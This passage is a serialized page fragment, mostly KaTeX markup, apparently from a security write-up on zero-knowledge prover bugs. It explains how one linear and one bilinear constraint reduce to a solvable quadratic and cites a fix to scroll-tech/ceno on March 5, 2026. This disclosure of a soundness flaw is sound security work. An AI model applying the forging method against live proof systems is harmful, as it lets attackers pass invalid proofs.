children":126548},{"className":126547},[10835,30],[126549],{"type":24,"tag":301,"props":126550,"children":126552},{"className":126551},[10835],[126553],{"type":30,"value":1004},{"type":24,"tag":301,"props":126555,"children":126557},{"className":126556,"style":99745},[10835],[126558],{"type":30,"value":9918},{"type":24,"tag":301,"props":126560,"children":126562},{"className":126561},[10835,30],[126563],{"type":24,"tag":301,"props":126564,"children":126566},{"className":126565},[10835],[126567],{"type":30,"value":125431},{"type":24,"tag":301,"props":126569,"children":126571},{"className":126570},[28486],[126572],{"type":30,"value":541},{"type":24,"tag":301,"props":126574,"children":126576},{"className":126575},[10835],[126577],{"type":30,"value":584},{"type":24,"tag":301,"props":126579,"children":126581},{"className":126580},[28508],[126582],{"type":30,"value":22200},{"type":24,"tag":301,"props":126584,"children":126586},{"className":126585},[28486],[126587],{"type":30,"value":541},{"type":24,"tag":301,"props":126589,"children":126591},{"className":126590},[10835],[126592],{"type":30,"value":584},{"type":24,"tag":301,"props":126594,"children":126596},{"className":126595},[28508],[126597],{"type":30,"value":22200},{"type":30,"value":2378},{"type":24,"tag":145,"props":126600,"children":126602},{"className":126601},[10807,10808],[126603],{"type":24,"tag":301,"props":126604,"children":126606},{"className":126605},[10813],[126607],{"type":24,"tag":301,"props":126608,"children":126610},{"className":126609,"ariaHidden":10819},[10818],[126611,126689],{"type":24,"tag":301,"props":126612,"children":126614},{"className":126613},[10824],[126615,126619,126676,126680,126685],{"type":24,"tag":301,"props":126616,"children":126618},{"className":126617,"style":116710},[10829],[],{"type":24,"tag":301,"props":126620,"children":126622},{"className":126621},[10835],[126623,126628],{"type":24,"tag":301,"props":126624,"children":126626},{"className":126625},[10835,28357],[126627],{"type":30,"value":26050},{"type":24,"tag":301,"props":126629,"children":126631},{"className":126630},[10850],[126632],{"type":24,"tag":301,"props":126633,"children":126635},{"className":126634},[10855,28411],[126636,126665],{"type":24,"tag":301,"props":126637,"children":126639},{"className":126638},[10860],[126640,126660],{"type":24,"tag":301,"props":126641,"children":126643},{"className":126642,"style":99797},[10865],[126644],{"type":24,"tag":301,"props":126645,"children":126646},{"style":99801},[126647,126651],{"type":24,"tag":301,"props":126648,"children":126650},{"className":126649,"style":10875},[10874],[],{"type":24,"tag":301,"props":126652,"children":126654},{"className":126653},[10880,10881,10882,10883],[126655],{"type":24,"tag":301,"props":126656,"children":126658},{"className":126657},[10835,10883],[126659],{"type":30,"value":546},{"type":24,"tag":301,"props":126661,"children":126663},{"className":126662},[28514],[126664],{"type":30,"value":28517},{"type":24,"tag":301,"props":126666,"children":126668},{"className":126667},[10860],[126669],{"type":24,"tag":301,"props":126670,"children":126672},{"className":126671,"style":99828},[10865],[126673],{"type":24,"tag":301,"props":126674,"children":126675},{},[],{"type":24,"tag":301,"props":126677,"children":126679},{"className":126678,"style":11012},[10914],[],{"type":24,"tag":301,"props":126681,"children":126683},{"className":126682},[11017],[126684],{"type":30,"value":523},{"type":24,"tag":301,"props":126686,"children":126688},{"className":126687,"style":11012},[10914],[],{"type":24,"tag":301,"props":126690,"children":126692},{"className":126691},[10824],[126693,126697,126738,126743,126748,126753,126758,126763],{"type":24,"tag":301,"props":126694,"children":126696},{"className":126695,"style":99687},[10829],[],{"type":24,"tag":301,"props":126698,"children":126700},{"className":126699},[10835],[126701,126710,126715,126724,126729],{"type":24,"tag":301,"props":126702,"children":126704},{"className":126703},[10835,30],[126705],{"type":24,"tag":301,"props":126706,"children":126708},{"className":126707},[10835],[126709],{"type":30,"value":100563},{"type":24,"tag":301,"props":126711,"children":126713},{"className":126712,"style":99745},[10835],[126714],{"type":30,"value":9918},{"type":24,"tag":301,"props":126716,"children":126718},{"className":126717},[10835,30],[126719],{"type":24,"tag":301,"props":126720,"children":126722},{"className":126721},[10835],[126723],{"type":30,"value":1004},{"type":24,"tag":301,"props":126725,"children":126727},{"className":126726,"style":99745},[10835],[126728],{"type":30,"value":9918},{"type":24,"tag":301,"props":126730,"children":126732},{"className":126731},[10835,30],[126733],{"type":24,"tag":301,"props":126734,"children":126736},{"className":126735},[10835],[126737],{"type":30,"value":125431},{"type":24,"tag":301,"props":126739,"children":126741},{"className":126740},[28486],[126742],{"type":30,"value":541},{"type":24,"tag":301,"props":126744,"children":126746},{"className":126745},[10835],[126747],{"type":30,"value":584},{"type":24,"tag":301,"props":126749,"children":126751},{"className":126750},[28508],[126752],{"type":30,"value":22200},{"type":24,"tag":301,"props":126754,"children":126756},{"className":126755},[28486],[126757],{"type":30,"value":541},{"type":24,"tag":301,"props":126759,"children":126761},{"className":126760},[10835],[126762],{"type":30,"value":546},{"type":24,"tag":301,"props":126764,"children":126766},{"className":126765},[28508],[126767],{"type":30,"value":22200},{"type":30,"value":126769}," we get the following constraint:",{"type":24,"tag":32,"props":126771,"children":126772},{},[126773],{"type":24,"tag":145,"props":126774,"children":126776},{"className":126775},[10807,10808],[126777],{"type":24,"tag":301,"props":126778,"children":126780},{"className":126779},[10813],[126781],{"type":24,"tag":301,"props":126782,"children":126784},{"className":126783,"ariaHidden":10819},[10818],[126785,126864,126942,126983],{"type":24,"tag":301,"props":126786,"children":126788},{"className":126787},[10824],[126789,126794,126851,126855,126860],{"type":24,"tag":301,"props":126790,"children":126793},{"className":126791,"style":126792},[10829],"height:0.5945em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":126795,"children":126797},{"className":126796},[10835],[126798,126803],{"type":24,"tag":301,"props":126799,"children":126801},{"className":126800},[10835,28357],[126802],{"type":30,"value":26050},{"type":24,"tag":301,"props":126804,"children":126806},{"className":126805},[10850],[126807],{"type":24,"tag":301,"props":126808,"children":126810},{"className":126809},[10855,28411],[126811,126840],{"type":24,"tag":301,"props":126812,"children":126814},{"className":126813},[10860],[126815,126835],{"type":24,"tag":301,"props":126816,"children":126818},{"className":126817,"style":99797},[10865],[126819],{"type":24,"tag":301,"props":126820,"children":126821},{"style":99801},[126822,126826],{"type":24,"tag":301,"props":126823,"children":126825},{"className":126824,"style":10875},[10874],[],{"type":24,"tag":301,"props":126827,"children":126829},{"className":126828},[10880,10881,10882,10883],[126830],{"type":24,"tag":301,"props":126831,"children":126833},{"className":126832},[10835,10883],[126834],{"type":30,"value":584},{"type":24,"tag":301,"props":126836,"children":126838},{"className":126837},[28514],[126839],{"type":30,"value":28517},{"type":24,"tag":301,"props":126841,"children":126843},{"className":126842},[10860],[126844],{"type":24,"tag":301,"props":126845,"children":126847},{"className":126846,"style":99828},[10865],[126848],{"type":24,"tag":301,"props":126849,"children":126850},{},[],{"type":24,"tag":301,"props":126852,"children":126854},{"className":126853,"style":10915},[10914],[],{"type":24,"tag":301,"props":126856,"children":126858},{"className":126857},[10920],[126859],{"type":30,"value":118002},{"type":24,"tag":301,"props":126861,"children":126863},{"className":126862,"style":10915},[10914],[],{"type":24,"tag":301,"props":126865,"children":126867},{"className":126866},[10824],[126868,126872,126929,126933,126938],{"type":24,"tag":301,"props":126869,"children":126871},{"className":126870,"style":126792},[10829],[],{"type":24,"tag":301,"props":126873,"children":126875},{"className":126874},[10835],[126876,126881],{"type":24,"tag":301,"props":126877,"children":126879},{"className":126878},[10835,28357],[126880],{"type":30,"value":26050},{"type":24,"tag":301,"props":126882,"children":126884},{"className":126883},[10850],[126885],{"type":24,"tag":301,"props":126886,"children":126888},{"className":126887},[10855,28411],[126889,126918],{"type":24,"tag":301,"props":126890,"children":126892},{"className":126891},[10860],[126893,126913],{"type":24,"tag":301,"props":126894,"children":126896},{"className":126895,"style":99797},[10865],[126897],{"type":24,"tag":301,"props":126898,"children":126899},{"style":99801},[126900,126904],{"type":24,"tag":301,"props":126901,"children":126903},{"className":126902,"style":10875},[10874],[],{"type":24,"tag":301,"props":126905,"children":126907},{"className":126906},[10880,10881,10882,10883],[126908],{"type":24,"tag":301,"props":126909,"children":126911},{"className":126910},[10835,10883],[126912],{"type":30,"value":546},{"type":24,"tag":301,"props":126914,"children":126916},{"className":126915},[28514],[126917],{"type":30,"value":28517},{"type":24,"tag":301,"props":126919,"children":126921},{"className":126920},[10860],[126922],{"type":24,"tag":301,"props":126923,"children":126925},{"className":126924,"style":99828},[10865],[126926],{"type":24,"tag":301,"props":126927,"children":126928},{},[],{"type":24,"tag":301,"props":126930,"children":126932},{"className":126931,"style":10915},[10914],[],{"type":24,"tag":301,"props":126934,"children":126936},{"className":126935},[10920],[126937],{"type":30,"value":118002},{"type":24,"tag":301,"props":126939,"children":126941},{"className":126940,"style":10915},[10914],[],{"type":24,"tag":301,"props":126943,"children":126945},{"className":126944},[10824],[126946,126950,126955,126965,126970,126974,126979],{"type":24,"tag":301,"props":126947,"children":126949},{"className":126948,"style":10935},[10829],[],{"type":24,"tag":301,"props":126951,"children":126953},{"className":126952},[28486],[126954],{"type":30,"value":362},{"type":24,"tag":301,"props":126956,"children":126958},{"className":126957},[10835,30],[126959],{"type":24,"tag":301,"props":126960,"children":126962},{"className":126961},[10835],[126963],{"type":30,"value":126964},"rest of product",{"type":24,"tag":301,"props":126966,"children":126968},{"className":126967},[28508],[126969],{"type":30,"value":9961},{"type":24,"tag":301,"props":126971,"children":126973},{"className":126972,"style":11012},[10914],[],{"type":24,"tag":301,"props":126975,"children":126977},{"className":126976},[11017],[126978],{"type":30,"value":523},{"type":24,"tag":301,"props":126980,"children":126982},{"className":126981,"style":11012},[10914],[],{"type":24,"tag":301,"props":126984,"children":126986},{"className":126985},[10824],[126987,126991],{"type":24,"tag":301,"props":126988,"children":126990},{"className":126989,"style":121759},[10829],[],{"type":24,"tag":301,"props":126992,"children":126994},{"className":126993},[10835,30],[126995],{"type":24,"tag":301,"props":126996,"children":126998},{"className":126997},[10835],[126999],{"type":30,"value":121770},{"type":24,"tag":32,"props":127001,"children":127002},{},[127003,127005,127158],{"type":30,"value":127004},"This is bilinear in ",{"type":24,"tag":145,"props":127006,"children":127008},{"className":127007},[10807,10808],[127009],{"type":24,"tag":301,"props":127010,"children":127012},{"className":127011},[10813],[127013],{"type":24,"tag":301,"props":127014,"children":127016},{"className":127015,"ariaHidden":10819},[10818],[127017],{"type":24,"tag":301,"props":127018,"children":127020},{"className":127019},[10824],[127021,127025,127030,127087,127092,127096,127153],{"type":24,"tag":301,"props":127022,"children":127024},{"className":127023,"style":10935},[10829],[],{"type":24,"tag":301,"props":127026,"children":127028},{"className":127027},[28486],[127029],{"type":30,"value":362},{"type":24,"tag":301,"props":127031,"children":127033},{"className":127032},[10835],[127034,127039],{"type":24,"tag":301,"props":127035,"children":127037},{"className":127036},[10835,28357],[127038],{"type":30,"value":26050},{"type":24,"tag":301,"props":127040,"children":127042},{"className":127041},[10850],[127043],{"type":24,"tag":301,"props":127044,"children":127046},{"className":127045},[10855,28411],[127047,127076],{"type":24,"tag":301,"props":127048,"children":127050},{"className":127049},[10860],[127051,127071],{"type":24,"tag":301,"props":127052,"children":127054},{"className":127053,"style":99797},[10865],[127055],{"type":24,"tag":301,"props":127056,"children":127057},{"style":99801},[127058,127062],{"type":24,"tag":301,"props":127059,"children":127061},{"className":127060,"style":10875},[10874],[],{"type":24,"tag":301,"props":127063,"children":127065},{"className":127064},[10880,10881,10882,10883],[127066],{"type":24,"tag":301,"props":127067,"children":127069},{"className":127068},[10835,10883],[127070],{"type":30,"value":584},{"type":24,"tag":301,"props":127072,"children":127074},{"className":127073},[28514],[127075],{"type":30,"value":28517},{"type":24,"tag":301,"props":127077,"children":127079},{"className":127078},[10860],[127080],{"type":24,"tag":301,"props":127081,"children":127083},{"className":127082,"style":99828},[10865],[127084],{"type":24,"tag":301,"props":127085,"children":127086},{},[],{"type":24,"tag":301,"props":127088,"children":127090},{"className":127089},[10946],[127091],{"type":30,"value":10949},{"type":24,"tag":301,"props":127093,"children":127095},{"className":127094,"style":10953},[10914],[],{"type":24,"tag":301,"props":127097,"children":127099},{"className":127098},[10835],[127100,127105],{"type":24,"tag":301,"props":127101,"children":127103},{"className":127102},[10835,28357],[127104],{"type":30,"value":26050},{"type":24,"tag":301,"props":127106,"children":127108},{"className":127107},[10850],[127109],{"type":24,"tag":301,"props":127110,"children":127112},{"className":127111},[10855,28411],[127113,127142],{"type":24,"tag":301,"props":127114,"children":127116},{"className":127115},[10860],[127117,127137],{"type":24,"tag":301,"props":127118,"children":127120},{"className":127119,"style":99797},[10865],[127121],{"type":24,"tag":301,"props":127122,"children":127123},{"style":99801},[127124,127128],{"type":24,"tag":301,"props":127125,"children":127127},{"className":127126,"style":10875},[10874],[],{"type":24,"tag":301,"props":127129,"children":127131},{"className":127130},[10880,10881,10882,10883],[127132],{"type":24,"tag":301,"props":127133,"children":127135},{"className":127134},[10835,10883],[127136],{"type":30,"value":546},{"type":24,"tag":301,"props":127138,"children":127140},{"className":127139},[28514],[127141],{"type":30,"value":28517},{"type":24,"tag":301,"props":127143,"children":127145},{"className":127144},[10860],[127146],{"type":24,"tag":301,"props":127147,"children":127149},{"className":127148,"style":99828},[10865],[127150],{"type":24,"tag":301,"props":127151,"children":127152},{},[],{"type":24,"tag":301,"props":127154,"children":127156},{"className":127155},[28508],[127157],{"type":30,"value":9961},{"type":30,"value":206},{"type":24,"tag":32,"props":127160,"children":127161},{},[127162,127164,127317],{"type":30,"value":127163},"We have two unknowns ",{"type":24,"tag":145,"props":127165,"children":127167},{"className":127166},[10807,10808],[127168],{"type":24,"tag":301,"props":127169,"children":127171},{"className":127170},[10813],[127172],{"type":24,"tag":301,"props":127173,"children":127175},{"className":127174,"ariaHidden":10819},[10818],[127176],{"type":24,"tag":301,"props":127177,"children":127179},{"className":127178},[10824],[127180,127184,127189,127246,127251,127255,127312],{"type":24,"tag":301,"props":127181,"children":127183},{"className":127182,"style":10935},[10829],[],{"type":24,"tag":301,"props":127185,"children":127187},{"className":127186},[28486],[127188],{"type":30,"value":362},{"type":24,"tag":301,"props":127190,"children":127192},{"className":127191},[10835],[127193,127198],{"type":24,"tag":301,"props":127194,"children":127196},{"className":127195},[10835,28357],[127197],{"type":30,"value":26050},{"type":24,"tag":301,"props":127199,"children":127201},{"className":127200},[10850],[127202],{"type":24,"tag":301,"props":127203,"children":127205},{"className":127204},[10855,28411],[127206,127235],{"type":24,"tag":301,"props":127207,"children":127209},{"className":127208},[10860],[127210,127230],{"type":24,"tag":301,"props":127211,"children":127213},{"className":127212,"style":99797},[10865],[127214],{"type":24,"tag":301,"props":127215,"children":127216},{"style":99801},[127217,127221],{"type":24,"tag":301,"props":127218,"children":127220},{"className":127219,"style":10875},[10874],[],{"type":24,"tag":301,"props":127222,"children":127224},{"className":127223},[10880,10881,10882,10883],[127225],{"type":24,"tag":301,"props":127226,"children":127228},{"className":127227},[10835,10883],[127229],{"type":30,"value":584},{"type":24,"tag":301,"props":127231,"children":127233},{"className":127232},[28514],[127234],{"type":30,"value":28517},{"type":24,"tag":301,"props":127236,"children":127238},{"className":127237},[10860],[127239],{"type":24,"tag":301,"props":127240,"children":127242},{"className":127241,"style":99828},[10865],[127243],{"type":24,"tag":301,"props":127244,"children":127245},{},[],{"type":24,"tag":301,"props":127247,"children":127249},{"className":127248},[10946],[127250],{"type":30,"value":10949},{"type":24,"tag":301,"props":127252,"children":127254},{"className":127253,"style":10953},[10914],[],{"type":24,"tag":301,"props":127256,"children":127258},{"className":127257},[10835],[127259,127264],{"type":24,"tag":301,"props":127260,"children":127262},{"className":127261},[10835,28357],[127263],{"type":30,"value":26050},{"type":24,"tag":301,"props":127265,"children":127267},{"className":127266},[10850],[127268],{"type":24,"tag":301,"props":127269,"children":127271},{"className":127270},[10855,28411],[127272,127301],{"type":24,"tag":301,"props":127273,"children":127275},{"className":127274},[10860],[127276,127296],{"type":24,"tag":301,"props":127277,"children":127279},{"className":127278,"style":99797},[10865],[127280],{"type":24,"tag":301,"props":127281,"children":127282},{"style":99801},[127283,127287],{"type":24,"tag":301,"props":127284,"children":127286},{"className":127285,"style":10875},[10874],[],{"type":24,"tag":301,"props":127288,"children":127290},{"className":127289},[10880,10881,10882,10883],[127291],{"type":24,"tag":301,"props":127292,"children":127294},{"className":127293},[10835,10883],[127295],{"type":30,"value":546},{"type":24,"tag":301,"props":127297,"children":127299},{"className":127298},[28514],[127300],{"type":30,"value":28517},{"type":24,"tag":301,"props":127302,"children":127304},{"className":127303},[10860],[127305],{"type":24,"tag":301,"props":127306,"children":127308},{"className":127307,"style":99828},[10865],[127309],{"type":24,"tag":301,"props":127310,"children":127311},{},[],{"type":24,"tag":301,"props":127313,"children":127315},{"className":127314},[28508],[127316],{"type":30,"value":9961},{"type":30,"value":127318}," and two equations, one linear and one bilinear:",{"type":24,"tag":6246,"props":127320,"children":127321},{},[127322,127649],{"type":24,"tag":2659,"props":127323,"children":127324},{},[127325,127327],{"type":30,"value":127326},"Linear (from GKR): ",{"type":24,"tag":145,"props":127328,"children":127330},{"className":127329},[10807,10808],[127331],{"type":24,"tag":301,"props":127332,"children":127334},{"className":127333},[10813],[127335],{"type":24,"tag":301,"props":127336,"children":127338},{"className":127337,"ariaHidden":10819},[10818],[127339,127475,127610,127636],{"type":24,"tag":301,"props":127340,"children":127342},{"className":127341},[10824],[127343,127348,127405,127462,127466,127471],{"type":24,"tag":301,"props":127344,"children":127347},{"className":127345,"style":127346},[10829],"height:0.7333em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":127349,"children":127351},{"className":127350},[10835],[127352,127357],{"type":24,"tag":301,"props":127353,"children":127355},{"className":127354},[10835,28357],[127356],{"type":30,"value":188},{"type":24,"tag":301,"props":127358,"children":127360},{"className":127359},[10850],[127361],{"type":24,"tag":301,"props":127362,"children":127364},{"className":127363},[10855,28411],[127365,127394],{"type":24,"tag":301,"props":127366,"children":127368},{"className":127367},[10860],[127369,127389],{"type":24,"tag":301,"props":127370,"children":127372},{"className":127371,"style":99797},[10865],[127373],{"type":24,"tag":301,"props":127374,"children":127375},{"style":99801},[127376,127380],{"type":24,"tag":301,"props":127377,"children":127379},{"className":127378,"style":10875},[10874],[],{"type":24,"tag":301,"props":127381,"children":127383},{"className":127382},[10880,10881,10882,10883],[127384],{"type":24,"tag":301,"props":127385,"children":127387},{"className":127386},[10835,10883],[127388],{"type":30,"value":584},{"type":24,"tag":301,"props":127390,"children":127392},{"className":127391},[28514],[127393],{"type":30,"value":28517},{"type":24,"tag":301,"props":127395,"children":127397},{"className":127396},[10860],[127398],{"type":24,"tag":301,"props":127399,"children":127401},{"className":127400,"style":99828},[10865],[127402],{"type":24,"tag":301,"props":127403,"children":127404},{},[],{"type":24,"tag":301,"props":127406,"children":127408},{"className":127407},[10835],[127409,127414],{"type":24,"tag":301,"props":127410,"children":127412},{"className":127411},[10835,28357],[127413],{"type":30,"value":26050},{"type":24,"tag":301,"props":127415,"children":127417},{"className":127416},[10850],[127418],{"type":24,"tag":301,"props":127419,"children":127421},{"className":127420},[10855,28411],[127422,127451],{"type":24,"tag":301,"props":127423,"children":127425},{"className":127424},[10860],[127426,127446],{"type":24,"tag":301,"props":127427,"children":127429},{"className":127428,"style":99797},[10865],[127430],{"type":24,"tag":301,"props":127431,"children":127432},{"style":99801},[127433,127437],{"type":24,"tag":301,"props":127434,"children":127436},{"className":127435,"style":10875},[10874],[],{"type":24,"tag":301,"props":127438,"children":127440},{"className":127439},[10880,10881,10882,10883],[127441],{"type":24,"tag":301,"props":127442,"children":127444},{"className":127443},[10835,10883],[127445],{"type":30,"value":584},{"type":24,"tag":301,"props":127447,"children":127449},{"className":127448},[28514],[127450],{"type":30,"value":28517},{"type":24,"tag":301,"props":127452,"children":127454},{"className":127453},[10860],[127455],{"type":24,"tag":301,"props":127456,"children":127458},{"className":127457,"style":99828},[10865],[127459],{"type":24,"tag":301,"props":127460,"children":127461},{},[],{"type":24,"tag":301,"props":127463,"children":127465},{"className":127464,"style":10915},[10914],[],{"type":24,"tag":301,"props":127467,"children":127469},{"className":127468},[10920],[127470],{"type":30,"value":11206},{"type":24,"tag":301,"props":127472,"children":127474},{"className":127473,"style":10915},[10914],[],{"type":24,"tag":301,"props":127476,"children":127478},{"className":127477},[10824],[127479,127483,127540,127597,127601,127606],{"type":24,"tag":301,"props":127480,"children":127482},{"className":127481,"style":127346},[10829],[],{"type":24,"tag":301,"props":127484,"children":127486},{"className":127485},[10835],[127487,127492],{"type":24,"tag":301,"props":127488,"children":127490},{"className":127489},[10835,28357],[127491],{"type":30,"value":188},{"type":24,"tag":301,"props":127493,"children":127495},{"className":127494},[10850],[127496],{"type":24,"tag":301,"props":127497,"children":127499},{"className":127498},[10855,28411],[127500,127529],{"type":24,"tag":301,"props":127501,"children":127503},{"className":127502},[10860],[127504,127524],{"type":24,"tag":301,"props":127505,"children":127507},{"className":127506,"style":99797},[10865],[127508],{"type":24,"tag":301,"props":127509,"children":127510},{"style":99801},[127511,127515],{"type":24,"tag":301,"props":127512,"children":127514},{"className":127513,"style":10875},[10874],[],{"type":24,"tag":301,"props":127516,"children":127518},{"className":127517},[10880,10881,10882,10883],[127519],{"type":24,"tag":301,"props":127520,"children":127522},{"className":127521},[10835,10883],[127523],{"type":30,"value":546},{"type":24,"tag":301,"props":127525,"children":127527},{"className":127526},[28514],[127528],{"type":30,"value":28517},{"type":24,"tag":301,"props":127530,"children":127532},{"className":127531},[10860],[127533],{"type":24,"tag":301,"props":127534,"children":127536},{"className":127535,"style":99828},[10865],[127537],{"type":24,"tag":301,"props":127538,"children":127539},{},[],{"type":24,"tag":301,"props":127541,"children":127543},{"className":127542},[10835],[127544,127549],{"type":24,"tag":301,"props":127545,"children":127547},{"className":127546},[10835,28357],[127548],{"type":30,"value":26050},{"type":24,"tag":301,"props":127550,"children":127552},{"className":127551},[10850],[127553],{"type":24,"tag":301,"props":127554,"children":127556},{"className":127555},[10855,28411],[127557,127586],{"type":24,"tag":301,"props":127558,"children":127560},{"className":127559},[10860],[127561,127581],{"type":24,"tag":301,"props":127562,"children":127564},{"className":127563,"style":99797},[10865],[127565],{"type":24,"tag":301,"props":127566,"children":127567},{"style":99801},[127568,127572],{"type":24,"tag":301,"props":127569,"children":127571},{"className":127570,"style":10875},[10874],[],{"type":24,"tag":301,"props":127573,"children":127575},{"className":127574},[10880,10881,10882,10883],[127576],{"type":24,"tag":301,"props":127577,"children":127579},{"className":127578},[10835,10883],[127580],{"type":30,"value":546},{"type":24,"tag":301,"props":127582,"children":127584},{"className":127583},[28514],[127585],{"type":30,"value":28517},{"type":24,"tag":301,"props":127587,"children":127589},{"className":127588},[10860],[127590],{"type":24,"tag":301,"props":127591,"children":127593},{"className":127592,"style":99828},[10865],[127594],{"type":24,"tag":301,"props":127595,"children":127596},{},[],{"type":24,"tag":301,"props":127598,"children":127600},{"className":127599,"style":10915},[10914],[],{"type":24,"tag":301,"props":127602,"children":127604},{"className":127603},[10920],[127605],{"type":30,"value":11206},{"type":24,"tag":301,"props":127607,"children":127609},{"className":127608,"style":10915},[10914],[],{"type":24,"tag":301,"props":127611,"children":127613},{"className":127612},[10824],[127614,127618,127623,127627,127632],{"type":24,"tag":301,"props":127615,"children":127617},{"className":127616,"style":117581},[10829],[],{"type":24,"tag":301,"props":127619,"children":127621},{"className":127620},[10835,28357],[127622],{"type":30,"value":294},{"type":24,"tag":301,"props":127624,"children":127626},{"className":127625,"style":11012},[10914],[],{"type":24,"tag":301,"props":127628,"children":127630},{"className":127629},[11017],[127631],{"type":30,"value":523},{"type":24,"tag":301,"props":127633,"children":127635},{"className":127634,"style":11012},[10914],[],{"type":24,"tag":301,"props":127637,"children":127639},{"className":127638},[10824],[127640,127644],{"type":24,"tag":301,"props":127641,"children":127643},{"className":127642,"style":100775},[10829],[],{"type":24,"tag":301,"props":127645,"children":127647},{"className":127646},[10835],[127648],{"type":30,"value":584},{"type":24,"tag":2659,"props":127650,"children":127651},{},[127652,127654],{"type":30,"value":127653},"Bilinear (from multiset): ",{"type":24,"tag":145,"props":127655,"children":127657},{"className":127656},[10807,10808],[127658],{"type":24,"tag":301,"props":127659,"children":127661},{"className":127660},[10813],[127662],{"type":24,"tag":301,"props":127663,"children":127665},{"className":127664,"ariaHidden":10819},[10818],[127666,127692,127770,127848,127874],{"type":24,"tag":301,"props":127667,"children":127669},{"className":127668},[10824],[127670,127674,127679,127683,127688],{"type":24,"tag":301,"props":127671,"children":127673},{"className":127672,"style":99660},[10829],[],{"type":24,"tag":301,"props":127675,"children":127677},{"className":127676,"style":101173},[10835,28357],[127678],{"type":30,"value":95387},{"type":24,"tag":301,"props":127680,"children":127682},{"className":127681,"style":10915},[10914],[],{"type":24,"tag":301,"props":127684,"children":127686},{"className":127685},[10920],[127687],{"type":30,"value":118002},{"type":24,"tag":301,"props":127689,"children":127691},{"className":127690,"style":10915},[10914],[],{"type":24,"tag":301,"props":127693,"children":127695},{"className":127694},[10824],[127696,127700,127757,127761,127766],{"type":24,"tag":301,"props":127697,"children":127699},{"className":127698,"style":126792},[10829],[],{"type":24,"tag":301,"props":127701,"children":127703},{"className":127702},[10835],[127704,127709],{"type":24,"tag":301,"props":127705,"children":127707},{"className":127706},[10835,28357],[127708],{"type":30,"value":26050},{"type":24,"tag":301,"props":127710,"children":127712},{"className":127711},[10850],[127713],{"type":24,"tag":301,"props":127714,"children":127716},{"className":127715},[10855,28411],[127717,127746],{"type":24,"tag":301,"props":127718,"children":127720},{"className":127719},[10860],[127721,127741],{"type":24,"tag":301,"props":127722,"children":127724},{"className":127723,"style":99797},[10865],[127725],{"type":24,"tag":301,"props":127726,"children":127727},{"style":99801},[127728,127732],{"type":24,"tag":301,"props":127729,"children":127731},{"className":127730,"style":10875},[10874],[],{"type":24,"tag":301,"props":127733,"children":127735},{"className":127734},[10880,10881,10882,10883],[127736],{"type":24,"tag":301,"props":127737,"children":127739},{"className":127738},[10835,10883],[127740],{"type":30,"value":584},{"type":24,"tag":301,"props":127742,"children":127744},{"className":127743},[28514],[127745],{"type":30,"value":28517},{"type":24,"tag":301,"props":127747,"children":127749},{"className":127748},[10860],[127750],{"type":24,"tag":301,"props":127751,"children":127753},{"className":127752,"style":99828},[10865],[127754],{"type":24,"tag":301,"props":127755,"children":127756},{},[],{"type":24,"tag":301,"props":127758,"children":127760},{"className":127759,"style":10915},[10914],[],{"type":24,"tag":301,"props":127762,"children":127764},{"className":127763},[10920],[127765],{"type":30,"value":118002},{"type":24,"tag":301,"props":127767,"children":127769},{"className":127768,"style":10915},[10914],[],{"type":24,"tag":301,"props":127771,"children":127773},{"className":127772},[10824],[127774,127778,127835,127839,127844],{"type":24,"tag":301,"props":127775,"children":127777},{"className":127776,"style":127346},[10829],[],{"type":24,"tag":301,"props":127779,"children":127781},{"className":127780},[10835],[127782,127787],{"type":24,"tag":301,"props":127783,"children":127785},{"className":127784},[10835,28357],[127786],{"type":30,"value":26050},{"type":24,"tag":301,"props":127788,"children":127790},{"className":127789},[10850],[127791],{"type":24,"tag":301,"props":127792,"children":127794},{"className":127793},[10855,28411],[127795,127824],{"type":24,"tag":301,"props":127796,"children":127798},{"className":127797},[10860],[127799,127819],{"type":24,"tag":301,"props":127800,"children":127802},{"className":127801,"style":99797},[10865],[127803],{"type":24,"tag":301,"props":127804,"children":127805},{"style":99801},[127806,127810],{"type":24,"tag":301,"props":127807,"children":127809},{"className":127808,"style":10875},[10874],[],{"type":24,"tag":301,"props":127811,"children":127813},{"className":127812},[10880,10881,10882,10883],[127814],{"type":24,"tag":301,"props":127815,"children":127817},{"className":127816},[10835,10883],[127818],{"type":30,"value":546},{"type":24,"tag":301,"props":127820,"children":127822},{"className":127821},[28514],[127823],{"type":30,"value":28517},{"type":24,"tag":301,"props":127825,"children":127827},{"className":127826},[10860],[127828],{"type":24,"tag":301,"props":127829,"children":127831},{"className":127830,"style":99828},[10865],[127832],{"type":24,"tag":301,"props":127833,"children":127834},{},[],{"type":24,"tag":301,"props":127836,"children":127838},{"className":127837,"style":10915},[10914],[],{"type":24,"tag":301,"props":127840,"children":127842},{"className":127841},[10920],[127843],{"type":30,"value":11206},{"type":24,"tag":301,"props":127845,"children":127847},{"className":127846,"style":10915},[10914],[],{"type":24,"tag":301,"props":127849,"children":127851},{"className":127850},[10824],[127852,127856,127861,127865,127870],{"type":24,"tag":301,"props":127853,"children":127855},{"className":127854,"style":99660},[10829],[],{"type":24,"tag":301,"props":127857,"children":127859},{"className":127858},[10835,28357],[127860],{"type":30,"value":77277},{"type":24,"tag":301,"props":127862,"children":127864},{"className":127863,"style":11012},[10914],[],{"type":24,"tag":301,"props":127866,"children":127868},{"className":127867},[11017],[127869],{"type":30,"value":523},{"type":24,"tag":301,"props":127871,"children":127873},{"className":127872,"style":11012},[10914],[],{"type":24,"tag":301,"props":127875,"children":127877},{"className":127876},[10824],[127878,127882],{"type":24,"tag":301,"props":127879,"children":127881},{"className":127880,"style":100775},[10829],[],{"type":24,"tag":301,"props":127883,"children":127885},{"className":127884},[10835],[127886],{"type":30,"value":584},{"type":24,"tag":32,"props":127888,"children":127889},{},[127890],{"type":30,"value":127891},"Substitution reduces this to a quadratic in one variable, which is solvable with the quadratic formula.",{"type":24,"tag":32,"props":127893,"children":127894},{},[127895,127899,127901,127908,127910,127917],{"type":24,"tag":60,"props":127896,"children":127897},{},[127898],{"type":30,"value":123449},{"type":30,"value":127900}," Fixed on March 5, 2026 via ",{"type":24,"tag":188,"props":127902,"children":127905},{"href":127903,"rel":127904},"https://github.com/scroll-tech/ceno/pull/1262",[192],[127906],{"type":30,"value":127907},"PR #1262",{"type":30,"value":127909}," (original report: ",{"type":24,"tag":188,"props":127911,"children":127914},{"href":127912,"rel":127913},"https://github.com/scroll-tech/ceno/issues/1125",[192],[127915],{"type":30,"value":127916},"#1125",{"type":30,"value":9961},{"type":24,"tag":2719,"props":127919,"children":127920},{},[],{"type":24,"tag":80,"props":127922,"children":127924},{"id":127923},"expander-polyhedra",[127925],{"type":30,"value":127926},"Expander 